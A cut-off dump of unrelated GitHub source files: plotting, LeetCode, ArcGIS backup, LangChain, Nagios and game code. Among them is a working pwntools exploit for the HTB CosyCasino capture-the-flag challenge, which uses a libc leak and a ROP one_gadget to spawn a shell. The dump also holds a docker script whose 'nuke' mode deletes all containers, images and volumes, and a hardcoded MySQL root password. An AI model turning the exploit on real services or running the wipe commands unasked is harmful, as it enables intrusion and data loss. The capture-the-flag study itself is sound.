plt.tight_layout()\n\n # 'octave\n fig, ax = plt.subplots(nrows=2, ncols=2)\n wwz_plot.octave_plotter(ax=ax[0, 0],\n TAU=WWZ_simple_octave[0],\n FREQ=WWZ_simple_octave[1],\n DATA=WWZ_simple_octave[2],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[0, 0].set_ylabel('full data (Hz)')\n ax[0, 0].set_xticks([])\n ax[0, 0].set_title('WWZ')\n\n wwz_plot.octave_plotter(ax=ax[1, 0],\n TAU=WWZ_simple_removed_octave[0],\n FREQ=WWZ_simple_removed_octave[1],\n DATA=WWZ_simple_removed_octave[2],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[1, 0].set_ylabel('removed data (Hz)')\n ax[1, 0].set_xlabel('time (s)')\n\n # Plot of WWA for the same signal\n wwz_plot.octave_plotter(ax=ax[0, 1],\n TAU=WWZ_simple_octave[0],\n FREQ=WWZ_simple_octave[1],\n DATA=WWZ_simple_octave[3],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[0, 1].set_title('WWA')\n ax[0, 1].set_xticks([])\n ax[0, 1].set_yticks([])\n\n wwz_plot.octave_plotter(ax=ax[1, 1],\n TAU=WWZ_simple_removed_octave[0],\n FREQ=WWZ_simple_removed_octave[1],\n DATA=WWZ_simple_removed_octave[3],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[1, 1].set_xlabel('time (s)')\n ax[1, 1].set_yticks([])\n plt.suptitle('Octave Method')\n plt.tight_layout()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n run_examples()\n","repo_name":"ISLA-UH/libwwz","sub_path":"examples/example_wwz.py","file_name":"example_wwz.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"70751626292","text":"class Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n # tranpose\n # left-right flip\n rows, cols = len(matrix), len(matrix[0])\n for r in range(rows):\n for c in range(r, cols):\n matrix[r][c], matrix[c][r] = matrix[c][r], matrix[r][c]\n \n for r in range(rows):\n for c in range(cols // 2):\n matrix[r][c], matrix[r][cols - c - 1] = matrix[r][cols - c - 1], matrix[r][c]\n \n \n ","repo_name":"HaojunYuan/MyLeetCode","sub_path":"0048-rotate-image/0048-rotate-image.py","file_name":"0048-rotate-image.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36656277918","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 9 12:12:37 2023\r\n\"\"\"\r\n__author__ = \"Manuel\"\r\n__date__ = \"Thu Feb 9 12:12:37 2023\"\r\n__license__ = \"Unlicense\"\r\n__version__ = \"1.0.1\"\r\n__maintainer__ = \"Manuel R. Popp\"\r\n__email__ = \"requests@cdpopp.de\"\r\n__status__ = \"Beta\"\r\n\r\nimport os, shutil, math\r\nimport arcpy as ap\r\nimport arcgis\r\nfrom arcgis.gis import GIS\r\n\r\nglobal AGOL_TYPES\r\nAGOL_TYPES = [\"CSV\",\r\n \"Dashboard\",\r\n \"Feature Collection\",\r\n \"Feature Service\",\r\n \"File Geodatabase\",\r\n \"Form\",\r\n \"KML\",\r\n \"KML Collection\",\r\n \"Service Definition\",\r\n \"Shapefile\",\r\n \"Web Map\"]\r\n\r\ndef get_value(inp):\r\n keep_types = (int, str, bool, type(None))\r\n val = inp.value if isinstance(inp.value, keep_types) else inp.valueAsText\r\n return val\r\n\r\nclass Toolbox(object):\r\n def __init__(self):\r\n self.label = \"AGOL Backup\"\r\n self.alias = \"Backup\"\r\n self.tools = [BackupLocal]\r\n\r\nclass BackupLocal(object):\r\n def __init__(self):\r\n self.label = \"Backup\"\r\n self.description = \"Create local backup of ArcGis Online items.\"\r\n self.canTunInBackground = False\r\n \r\n def getParameterInfo(self):\r\n global AGOL_TYPES\r\n USR = ap.Parameter(\r\n displayName = \"AGOL username\",\r\n name = \"usr\",\r\n datatype = \"GPString\",\r\n parameterType = \"Required\",\r\n direction = \"Input\")\r\n USR.value = \"manuel.popp_KIT\"\r\n PW = ap.Parameter(\r\n displayName = \"Password\",\r\n name = \"psswrd\",\r\n datatype = \"GPEncryptedString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\")\r\n PW.value = None\r\n COMPLETE = ap.Parameter(\r\n displayName = \"Complete backup\",\r\n name = \"complete\",\r\n datatype = \"GPBoolean\",\r\n parameterType = \"Required\",\r\n direction = \"Input\")\r\n COMPLETE.value = True\r\n OWNER = ap.Parameter(\r\n displayName = \"Owner (if different from user)\",\r\n name = \"owner\",\r\n datatype = \"GPString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\")\r\n OWNER.value = None\r\n DTYPES = ap.Parameter(\r\n displayName = \"Data types\",\r\n name = \"dtypes\",\r\n datatype = \"GPString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\",\r\n multiValue = True)\r\n DTYPES.filter.list = AGOL_TYPES\r\n DTYPES.value = None\r\n TAGS = ap.Parameter(\r\n displayName = \"Tags\",\r\n name = \"tags\",\r\n datatype = \"GPString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\",\r\n multiValue = True)\r\n OVERWRITE = ap.Parameter(\r\n displayName = \"Overwrite existing files\",\r\n name = \"overwrite\",\r\n datatype = \"GPBoolean\",\r\n parameterType = \"Required\",\r\n direction = \"Input\")\r\n OVERWRITE.value = False\r\n OUT_DIR = ap.Parameter(\r\n displayName = \"Backup directory\",\r\n name = \"out_dir\",\r\n datatype = \"DEFolder\",\r\n parameterType = \"Required\",\r\n direction = \"Output\")\r\n \r\n parameters = [USR, PW, COMPLETE, OWNER, DTYPES, TAGS, OVERWRITE, \\\r\n OUT_DIR]\r\n return parameters\r\n\r\n def isLicensed(self):\r\n return True\r\n\r\n def updateParameters(self, parameters):\r\n [USR, PW, COMPLETE, OWNER, DTYPES, TAGS, OVERWRITE, OUT_DIR] = \\\r\n parameters\r\n if COMPLETE.value:\r\n DTYPES.enabled = TAGS.enabled = False\r\n else:\r\n DTYPES.enabled = TAGS.enabled = True\r\n return\r\n\r\n def updateMessages(self, parameters):\r\n return\r\n\r\n def execute(self, parameters, messages):\r\n global AGOL_TYPES\r\n [USR, PW, COMPLETE, OWNER, DTYPES, TAGS, OVERWRITE, OUT_DIR] = \\\r\n [get_value(p) for p in parameters]\r\n \r\n if not os.path.isdir(OUT_DIR):\r\n os.makedirs(OUT_DIR, exist_ok = True)\r\n \r\n if PW is None:\r\n gis = GIS(\"pro\")\r\n else:\r\n gis = GIS(username = USR, password = PW)\r\n \r\n account_name = USR if OWNER is None else OWNER\r\n QUERY_STRING = \"owner:{0}\".format(account_name)\r\n my_content = gis.content.search(QUERY_STRING,\r\n max_items = 999)\r\n \r\n mssg = \"Found {0} items for user {1} on AGOL.\"\r\n n_items = len(my_content)\r\n ap.AddMessage(mssg.format(n_items, account_name))\r\n allowed_types = str(DTYPES).split(\";\") if not COMPLETE else \\\r\n AGOL_TYPES\r\n \r\n allowed_tags = set(str(TAGS).split(\";\")) if TAGS is not None else set()\r\n \r\n failed_downloads = []\r\n \r\n p = int(math.log10(n_items))\r\n \r\n if not p:\r\n p = 1\r\n \r\n increment = int(math.pow(10, p - 1))\r\n \r\n ap.SetProgressor(\"step\", \"Downloading items from AGOL...\", 0, n_items,\r\n increment)\r\n \r\n for i, item in enumerate(my_content):\r\n mssg = \"Checking conditions for item {0} of {1}\"\r\n ap.SetProgressorLabel(mssg.format(i, n_items))\r\n \r\n tagmatch = allowed_tags == set() or allowed_tags.intersection(\r\n set(item.tags))\r\n typematch = item.type in allowed_types\r\n mssg = \"Item {0}. Type: {1}\\nMatches item types: {2}\"\r\n ap.AddMessage(mssg.format(i, item.type, typematch))\r\n \r\n if tagmatch and typematch:\r\n try:\r\n item_name = item.title if item.title is not None else \\\r\n item.name\r\n path = os.path.join(OUT_DIR, item_name)\r\n \r\n if os.path.exists(path) and not OVERWRITE:\r\n continue\r\n \r\n mssg = \"Attempting to download {0} from ArcGIS Online.\"\r\n \r\n if item.type == \"Feature Service\":\r\n ap.SetProgressorLabel(mssg.format(item.title))\r\n ap.AddMessage(mssg.format(item.title))\r\n result = item.export(item.name, \"Shapefile\")\r\n result.download(path)\r\n result.delete()\r\n else:\r\n ap.SetProgressorLabel(mssg.format(item.name))\r\n ap.AddMessage(mssg.format(item.name))\r\n tmp = item.get_data()\r\n mssg = \"Saved as temporary file at \" + tmp\r\n ap.AddMessage(mssg)\r\n mssg = \"Attempting to move temporary file to \" + \\\r\n OUT_DIR\r\n ap.AddMessage(mssg)\r\n shutil.move(tmp, path)\r\n \r\n if os.path.getsize(path) > 0.:\r\n ap.AddMessage(\"Download successful.\")\r\n except:\r\n failed_downloads.append(item)\r\n mssg = \"Failed to download {0}.\"\r\n ap.AddWarning(mssg.format(item_name))\r\n ap.SetProgressorPosition(i)\r\n return\r\n","repo_name":"ManuelPopp/Sandbox","sub_path":"GIS/ArcGIS/Toolboxes/AGOL_Backup.pyt","file_name":"AGOL_Backup.pyt","file_ext":"pyt","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14825480871","text":"from pwn import *\nfrom pwn import p64\n\nIS_LOCAL = False\nIS_DEBUG = False\n\nINPUT_PATCHED_FILENAME = \"casino_patched\"\nINPUT_ORIG_FILENAME = \"casino\"\n\nREMOTE_HOST = \"\"\nREMOTE_PORT = 31375\n\n# setup terminal\ncontext.terminal = ['tmux', 'new-window', '-F' '#{pane_pid}', '-P']\n#run_in_new_terminal('bash')\n\nif IS_LOCAL:\n if IS_DEBUG:\n io = process(INPUT_PATCHED_FILENAME, aslr=False)\n #break *0x555555400f2b\n #break *0x555555400f26\n pid, io_gdb = gdb.attach(io, api=True, gdbscript=\"\"\"\n break *0x555555400f50\n continue\n \"\"\")\n else:\n io = process(INPUT_PATCHED_FILENAME)\nelse:\n io = remote(REMOTE_HOST, REMOTE_PORT)\n\ndef enter_game():\n io.recvuntil(b\"> \")\n io.sendline(b\"1\")\n\ndef skip_main_games():\n gems = 69\n while gems > 6:\n # select \"Rigged Roulette\"\n io.recvuntil(b\"> \")\n io.sendline(b\"1\")\n\n # send a wrong choice\n io.recvuntil(b\"> \")\n io.sendline(b\"-1\")\n\n # adjust a gems count\n gems -= 6\n\ndef skip_additional_roulette():\n io.recvuntil(b\"> \")\n io.sendline(b\"1\")\n\ndef get_image_base() -> int:\n io.recvuntil(b\"> \")\n io.sendline(b\".\")\n\n s = io.recvline_contains(b\"is not a valid number!\")\n\n leak_bin_addr = int(s.split(b' ', 2)[1], 10)\n\n LOCAL_BIN_LEAK = 0x555555400b20\n LOCAL_IMAGE_BASE = 0x00555555400000\n IMAGE_BASE_OFFSET = LOCAL_BIN_LEAK - LOCAL_IMAGE_BASE\n\n image_base = leak_bin_addr - IMAGE_BASE_OFFSET\n return image_base\n\ndef exploit(image_base: int):\n io.recvuntil(b\"> \")\n\n ret_addr = cyclic_find(b'oaaa')\n log.info(f'RET offset: {hex(ret_addr)}')\n\n # new_canary_offset = cyclic_find(b'kaaa')\n # log.info(f'New CANARY offset: {hex(new_canary_offset)}')\n\n # saved_canary_offset = cyclic_find(b'naav')\n # log.info(f'Saved CANARY offset: {hex(saved_canary_offset)}')\n\n elf = ELF(INPUT_ORIG_FILENAME)\n p_got_read = image_base + elf.got['read']\n p_plt_puts = image_base + elf.plt['puts']\n p_last_chance = image_base + elf.symbols['last_chance']\n\n # 0x00000000000018f3: pop rdi; ret;\n pop_rdi = image_base + 0x00000000000018f3\n\n # leak LIBC address\n payload = flat(\n {\n ret_addr: pop_rdi,\n ret_addr+0x8: p_got_read,\n ret_addr+0x10: p_plt_puts,\n ret_addr+0x18: p_last_chance#,\n #new_canary_offset: 0xAAAAAAAAAAAAAAAA,\n #saved_canary_offset: 0xAAAAAAAAAAAAAAAA\n },\n word_size = 64,\n filler = b'\\0',\n length = 0x8F8\n )\n\n log.info('Sending the 1st exploit to get a LIBC address...')\n io.sendline(payload)\n recv_line = io.recvline()\n recv_line = io.recvline().strip()\n libc_leak = int.from_bytes(recv_line, 'little')\n\n LIBC_LOCAL_BASE = 0x7ffff77c3000\n LIBC_LOCAL_LEAK = 0x7ffff7bc5430\n LIBC_BASE_OFFSET = LIBC_LOCAL_LEAK - LIBC_LOCAL_BASE\n libc_base = libc_leak - LIBC_BASE_OFFSET\n io.info(f'LIBC base: {hex(libc_base)}')\n\n # ONE_GADGET_1 = libc_base + 0x4f3d5\n ONE_GADGET_2 = libc_base + 0x4f432\n # ONE_GADGET_3 = libc_base + 0x10a41c\n\n # leak LIBC address\n payload = flat(\n {\n ret_addr: ONE_GADGET_2#,\n #new_canary_offset: 0x0,\n #saved_canary_offset: 0x0\n },\n word_size = 64,\n filler = b'\\0',\n length = 0x8F8\n )\n\n log.info('Sending the 2nd exploit with one gadget ROP...')\n io.sendline(payload)\n\nlog.info('Paying for the game to start...')\nenter_game()\n\nlog.info('Skip main games...')\nskip_main_games()\n\nlog.info('Skip additional game...')\nskip_additional_roulette()\n\nlog.info('Trying to get binary image base...')\nimage_base = get_image_base()\n\nlog.info(f\"Found binary image base: {hex(image_base)}\")\n\nlog.info('Prepare exploit...')\nexploit(image_base)\n\nlog.info('Spawning shell...')\nio.interactive()\n","repo_name":"AndyWatterman/CTF-Writeups","sub_path":"HTB/CosyCasino/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70550049973","text":"from langchain.chains import RetrievalQA\nfrom langchain.chains.base import Chain\nfrom langchain.document_loaders import TextLoader\nfrom langchain.indexes.vectorstore import VectorstoreIndexCreator\nfrom langchain.schema.embeddings import Embeddings\nfrom langchain.schema.language_model import BaseLanguageModel\nfrom langchain.text_splitter import TextSplitter\n\n\nclass SampleQA:\n \"\"\"Define the flow of the model to be adjusted.\"\"\"\n\n def __init__(\n self,\n data_path: str,\n embedding: Embeddings,\n text_splitter: TextSplitter,\n llm: BaseLanguageModel,\n ) -> None:\n \"\"\"Input the elements necessary for LLM flow The arguments here will be used as a\n hyperparameters and optimized.\n\n the arguments are defined by `configs/model/sample.yaml`\n \"\"\"\n self.embedding = embedding\n self.text_splitter = text_splitter\n self.text_loader = TextLoader(data_path)\n self.llm = llm\n self.index = VectorstoreIndexCreator(\n embedding=self.embedding, text_splitter=self.text_splitter\n ).from_loaders([self.text_loader])\n\n self.chain = RetrievalQA.from_chain_type(\n self.llm,\n retriever=self.index.vectorstore.as_retriever(),\n return_source_documents=True,\n )\n\n def __call__(self, question: str) -> str:\n \"\"\"Answer the question.\"\"\"\n return self.chain(question)\n\n def get_chain(self) -> Chain:\n \"\"\"Get langchain chain.\"\"\"\n return self.chain\n","repo_name":"Yongtae723/LLMFlowOptimizer","sub_path":"llmflowoptimizer/component/model/sample_qa.py","file_name":"sample_qa.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"70687185013","text":"#!/opt/venv/bin/python\nfrom argoss_libs.snmp.probe import SNMPProbe\nfrom argoss_libs.snmp.skeletton import SNMPSkeletton\nimport nagiosplugin\n\n\nclass DellTemp(SNMPProbe):\n def probe(self):\n oid = '1.3.6.1.4.1.674.10892.1.700.20.1.6.1.1'\n alert_temp = float(self.argoss_snmp.fetch_oid(oid))\n yield nagiosplugin.Metric('alert_temp',\n round(alert_temp / 10.0, 1),\n None,\n context='alert_temp')\n\n\ndef main():\n argp = SNMPSkeletton.default_args('Check temperature on Dell.')\n args = argp.parse_args()\n check = nagiosplugin.Check(\n DellTemp(args.host, args.port, args.community, args.version),\n nagiosplugin.ScalarContext('alert_temp',\n args.warning,\n args.critical))\n check.main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"aurimukas/icinga2_plugins","sub_path":"old/check_dell_temp.py","file_name":"check_dell_temp.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"386537257","text":"import random\n\n\nclass SnakeLadderGame:\n # default board_game\n board_game_default = [\n [-1, 78, -1, -1, -1, 75, -1, 73, -1, -1],\n [-1, -1, -1, -1, -1, -1, 24, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, -1, -1, -1, 91],\n [-1, 19, 81, 60, -1, -1, -1, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, 34, -1, -1, 67],\n [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1],\n [59, -1, -1, -1, -1, -1, -1, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, -1, 84, -1, -1],\n [38, -1, -1, 7, -1, -1, -1, -1, -1, -1],\n [-1, -1, -1, 14, -1, -1, -1, -1, 31, -1],\n ]\n\n def __init__(self, players, board=None):\n \"\"\"\n constructor of Game\n :param players: list of players playing the game\n :param board: snake ladder board - by default there is given one board\n board in the form of -1 and values\n -1 denotes no snake and ladder\n value denotes the jump to or push down to that value\n\n values:\n winner = winner of this game\n size = length of the board\n pos_board = display the board in which each player position is given by its id\n \"\"\"\n if board is None:\n board = SnakeLadderGame.board_game_default\n self.players = players\n self.winner = None\n self.board_game = board\n self.size = len(self.board_game)\n self.pos_board = list(([-1] * self.size) for i in range(self.size))\n\n def pos_board_display(self):\n \"\"\" display the board in which each player position is given by its id \"\"\"\n for row in self.pos_board:\n for col in row:\n print(col, end=\" \")\n print()\n\n @property\n def board_game(self):\n \"\"\" board game getter \"\"\"\n return self.__board_game\n\n @board_game.setter\n def board_game(self, board):\n \"\"\" board game setter \"\"\"\n self.__board_game = board\n\n @property\n def size(self):\n \"\"\" size getter\"\"\"\n return self.__size\n\n @size.setter\n def size(self, size):\n \"\"\"size setter\"\"\"\n self.__size = size\n\n @property\n def roll_dice(self):\n \"\"\"\n :return: random integer between 1 and 6 (both inclusive)\n \"\"\"\n return random.randint(1, 6)\n\n @property\n def players(self):\n \"\"\"\n getter\n :return:list of players\n \"\"\"\n return self.__players\n\n @players.setter\n def players(self, players):\n \"\"\" setter\n :param players: list of players\n :return: None\n \"\"\"\n self.__players = players\n\n @property\n def winner(self):\n \"\"\" returns the winner of that game \"\"\"\n return self.__winner\n\n @winner.setter\n def winner(self, player):\n \"\"\" setter of the winner of that board\"\"\"\n self.__winner = player\n\n def placed(self, x, y, player):\n \"\"\"\n place the player into new position\n\n :param x: x coordinates\n :param y: y coordinates\n :param player: current player turn\n :return: whether curr player cuts the giti or not\n \"\"\"\n player.pos = [x, y]\n flag = False\n # some player is already in that position and that player is not current player ( snakes bites and move to\n # current position )\n if self.pos_board[x][y] != -1 and self.pos_board[x][y] != player.unique_id:\n pl_id = self.pos_board[x][y]\n print(\"It cuts the giti of \" + self.players[pl_id].name + \" and get another chance of rolling a dice .\")\n self.players[pl_id].pos = None\n flag = True\n self.pos_board[x][y] = player.unique_id\n return flag\n\n def calculate_target_value(self, x, y):\n \"\"\"\n find out the number on the board from the coordinates\n\n some examples are (board size 10 * 10 ):\n (9,8) -> 9\n (3,5) -> 66\n\n :param x: x coordinate\n :param y: y coordinate\n\n :return: value on the board after conversion\n \"\"\"\n n = self.size - 1\n # print(\"(\" + str(x) + \",\" + str(y) + \")-->\", end=\" \")\n x = n - x\n if x % 2 != 0:\n y = n - y\n value = (x * (n + 1)) + y + 1\n # print(str(value))\n return value\n\n def calculate_position(self, value):\n \"\"\"\n find out the coordinates x and y from the number on the board\n\n some examples are (board size 10 * 10 ):\n 9 - > (9,8)\n 66 -> (3,5)\n\n :param value: the number on the board\n\n :return: x and y coordinates of the board after conversion\n \"\"\"\n n = self.size\n x = int((value - 1) / n)\n y = int((value - 1) % n)\n if x % 2 != 0:\n y = n - 1 - y\n x = n - 1 - x\n # print(str(value)+\"---->\"+\"(\" + str(x) + \",\" + str(y) + \")\")\n return x, y\n\n def move(self, player):\n \"\"\"\n this is the main function in which\n player first roll the dice then move to the new position and checks accordingly\n if it gets 6 on dice it gets another chance\n and also on a new position if there is another player it cuts the giti of the that player\n \"\"\"\n dice = self.roll_dice # random value on the dice from 1 and 6\n print(\" rolls a dice and get number \" + str(dice), end=\", \")\n new_turn = False # new turn whenever player cuts the giti of another player\n if player.pos is None: # player is at home\n if dice == 1 or dice == 6: # when player open its giti only on 6 and 1\n print(\"and opens its giti \", end=\", \")\n player.pos = [self.size - 1, -1] # set the position to bottommost leftmost corner\n else: # didn't open its giti\n print(\"but is at home \", end=\", \")\n\n else:\n x, y = player.pos # current position of that player\n n = self.size # size of the board\n curr_val = self.calculate_target_value(x, y) # value of the board on that coordinates x and y\n tar_val = curr_val + dice # new value in which player to move\n if tar_val <= n * n: # when the move is possible on the board\n new_x, new_y = self.calculate_position(tar_val)\n if self.board_game[new_x][new_y] == -1: # no snake or ladder on that position\n print(\"and move from \" + str(curr_val) + \" to \" + str(tar_val), end=\", \")\n new_turn = self.placed(new_x, new_y, player) # place the player to that position and return\n # whether it cuts the giti of another player\n else: # exist snake or ladder in that position\n print(\"and move from \" + str(curr_val) + \" to \" + str(tar_val), end=\", \")\n value = tar_val # position at which snake or ladder exist\n tar_val = self.board_game[new_x][new_y] # the new position after snake bites or ladder jump\n if value < tar_val: # ladder:- new value greater than old\n print(\"and ladder @ \" + str(value) + \": jump to \" + str(tar_val), end=\", \")\n else: # snake :- new value is smaller than current value\n print(\"and Snake bites @ \" + str(value) + \": push down to \" + str(tar_val), end=\", \")\n new_x, new_y = self.calculate_position(tar_val) # calculate the x and y from the value\n new_turn = self.placed(new_x, new_y, player) # place the player to that position and return\n # whether it cuts the giti of another player\n # when the player is not at home and change its previous position to -1 that is reset in the pos board\n if y != -1:\n self.pos_board[x][y] = -1\n # this player reach the destination and declared as winner\n if tar_val == (n * n):\n self.winner = player # set the winner of this game\n player.win = True # change the status of the player to winner\n return\n\n else: # when move is not possible\n print(\"new position is \" + str(tar_val) + \" which is not possible on the board \", end=\" \")\n return\n if new_turn: # when again turn when players cuts the giti of another player\n self.move(player)\n elif dice == 6: # again turn when there is 6 on dice\n print(\"and gets another chance as 6 on the last dice roll\")\n self.move(player)\n\n def start(self):\n \"\"\" start the game with player 1 and so on \"\"\"\n idx = 0 # starting from index 0\n curr_player = self.players[idx] # curr _palyer starts from player 1\n rounds = 0 # number of rounds in a game\n while not curr_player.win:\n if idx == 0:\n rounds += 1\n curr_player = self.players[idx]\n print(curr_player.name + \" turns : \")\n self.move(curr_player)\n idx += 1 # next player turn\n idx = idx % len(self.players) # after last player then player 1 gets turn\n print()\n return rounds\n","repo_name":"piyush1998gupta/snake_ladder_game","sub_path":"snake_ladder.py","file_name":"snake_ladder.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72084801653","text":"from __future__ import print_function\nimport re\nimport os\n\ndef log(*args, **kwargs):\n _log_real(*map(str, args), **kwargs)\n\n_debug_level = int(os.environ.get('DEBUG', 0))\n\ndef _log_real(*args, **kwargs):\n level = kwargs.get('level', 0)\n if level <= _debug_level:\n print(*args)\n\nclass Exit(BaseException):\n pass\n\nimport re\n_quote_pos = re.compile('(?=[^-0-9a-zA-Z_./\\n])')\n\ndef shell_quote(arg):\n if arg:\n return _quote_pos.sub('\\\\\\\\', arg).replace('\\n',\"'\\n'\")\n else:\n return \"''\"\n\ndef list_to_command(args):\n return ' '.join(map(shell_quote, args))\n\ndef as_utf8(arg):\n if isinstance(arg, str):\n return arg\n else:\n return arg.encode('utf8')\n\ndef trim_long_string(text, limit=20):\n if len(text) > limit:\n return text[:limit-3] + '...'\n else:\n return text\n\nclass Enum(set):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n","repo_name":"zielmicha/viewsh","sub_path":"viewsh/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19343440611","text":"__pragma__(\"alias\",\"s\",\"$\")\nfrom Widget import Widget\nfrom Popup import Popup\nfrom SwiperSlider import SwiperSlider\nfrom BoxText import BoxText\nclass PopupExplication(Widget):\n\t\"\"\"docstring for Button\"\"\"\n\tdef __init__(self, titulo=\"Presionar\"):\n\t\tPopup.__init__(self,titulo)\n\t\tself._html=\"\"\"\n\t\t
\n\t\t
\n\t\t
\n\t\t
\n\t\t
\n\t\t
\n\t\t
\n\n\t\t
\n\t\t\"\"\"\n\t\tself.target.find(\">.content\").html(self._html)\n\t\tself.slider=SwiperSlider()\n\t\tself.BoxText=BoxText()\n\n\n\t\t\n\t\t\n\tdef titulo(self,titulo):\n\t\tself.target.find(\".titulo\").text(titulo)\n\t\tself._titulo=titulo\n\n\tdef update(self):\n\t\tself.format=[self._titulo]\n\t\tself.__update__()\n\t\tself.__titulo=self.target.find(\">.titulo\")\n\t\tself.titulo(self._titulo)\n\t\tself.slider.update()\n\t\tself.BoxText.update()\n\t\ts(self.target.find(\".>content\").find(\">.container\").find(\">.row\").find(\">.col-md-6\")[0]).html(self.slider.target)\n\t\ts(self.target.find(\".>content\").find(\">.container\").find(\">.row\").find(\">.col-md-6\")[1]).html(self.BoxText.target)\n\t\t\n\t\n\t\n\t\t\n\n\n\t\t","repo_name":"ZerpaTechnology/asenzor-v2","sub_path":"Components/PopupExplication.py","file_name":"PopupExplication.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24390671558","text":"#!/usr/bin/env python\n\n# import cmd\nimport os\n# import argparse\nimport sys\nfrom colorama import Fore, Back\n\n__version__ = \"0.0.1\"\n\ndef cmd_line(s):\n print(Fore.GREEN + \">> \" + s + Fore.RESET)\n ret = os.popen(s).read()\n print(ret)\n\n# def handle_args():\n# parser = argparse.ArgumentParser(description=\"This is a cool program\")\n# parser.add_argument(\"cmd\", help=\"command: status\")\n# # parser.add_argument(\"-V\", \"--version\", help=\"show program version\", action=\"store_true\")\n# args = parser.parse_args()\n# return args\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 2:\n print(Fore.RED + f\"*** Error: {sys.argv[0]} takes 1 argument ***\")\n exit(1)\n\n arg = sys.argv[1]\n cmds = None\n\n if arg == \"status\":\n cmds = [\n \"docker ps\",\n \"docker images\",\n \"docker system df -v\"\n ]\n\n elif arg == \"version\":\n print(sys.argv[0], __version__)\n\n elif arg == \"build\":\n NAME = \"pi-opencv\"\n VERSION = \"0.5.0\"\n cmds = [\n f\"docker build -t walchko/{NAME}:{VERSION} .\",\n f\"docker images walchko/{NAME}\"\n ]\n\n elif arg == \"clean\":\n cmds = [\n \"docker volume rm $(docker volume ls -qf dangling=true) $(docker ps -a -q)\", # delete orphaned/dangling volumes\n \"docker rmi $(docker images -q -f dangling=true)\" # delete dangling/untagged images\n # docker rm $(docker ps -a -q)\n ]\n\n elif arg == \"nuke\":\n print(\">> nuke everything ... ha ha ha!!\")\n cmds = [\n \"docker kill $(docker ps -q)\", # kill all running containers\n \"docker stop $(docker ps -a -q)\",\n \"docker rm $(docker ps -a -q)\", # delete all containers\n \"docker system prune -a -f\",\n \"docker images prune -a\",\n \"docker volume prune -f\",\n \"docker container prune -f\",\n \"docker rmi $(docker images -a -q)\" # delete all images\n ]\n else:\n print(Fore.RED + f\"*** Unknown command: {arg} ***\" + Fore.RESET)\n\n if cmds:\n for c in cmds:\n a = cmd_line(c)\n print(a)\n print(\"-\"*40)\n","repo_name":"MomsFriendlyRobotCompany/dpkg_opencv","sub_path":"docker/archive/ds.py","file_name":"ds.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29565874274","text":"import sqlString as sql\nimport pymysql\nimport numpy as np\nimport csv\n\ndef has_key(dictionary, key):\n\tif(key in dictionary):\n\t\treturn 1\n\treturn 0\n\nconn=pymysql.connect(db='ca', user='root', passwd='mickey94378', charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n\ndef CountHistoryCos(grade):\n\tisFour=0\n\tif grade==\"四\":\n\t\ttarget_grade=\"四\"\n\t\tisFour=1\n\telif grade=='三':\n\t\ttarget_grade=\"四\"\n\telif grade=='二':\n\t\ttarget_grade=\"三\"\n\telif grade=='一':\n\t\ttarget_grade=\"二\"\n\n\tcursor=conn.cursor()\n\tcursor.execute(sql.FindAllCos)\n\tresult=cursor.fetchall()\n\n\tgrade_dict={}\n\tfor i in range(len(result)):\n\t\tif not isFour and result[i]['grade']==target_grade and result[i]['unique_id'][:5]=='107-1':\n\t\t\tkey=result[i]['unique_id']\n\t\t\tif has_key(grade_dict, key)==1:\n\t\t\t\tgrade_dict[key]['count']=grade_dict[key]['count']+1\n\t\t\telse:\n\t\t\t\tgrade_dict[key]=result[i]\n\t\t\t\tgrade_dict[key]['count']=1\n\t\telse:\n\t\t\t# 大四\n\t\t\tif result[i]['study_status']==\"畢業\" and result[i]['grade']==target_grade and result[i]['unique_id'][:5]=='106-2':\n\t\t\t\tkey=result[i]['unique_id']\n\t\t\t\tif has_key(grade_dict, key)==1:\n\t\t\t\t\tgrade_dict[key]['count']=grade_dict[key]['count']+1\n\t\t\t\telse:\n\t\t\t\t\tgrade_dict[key]=result[i]\n\t\t\t\t\tgrade_dict[key]['count']=1\n\treturn grade_dict\n\n# Compare course on current semester\ndef 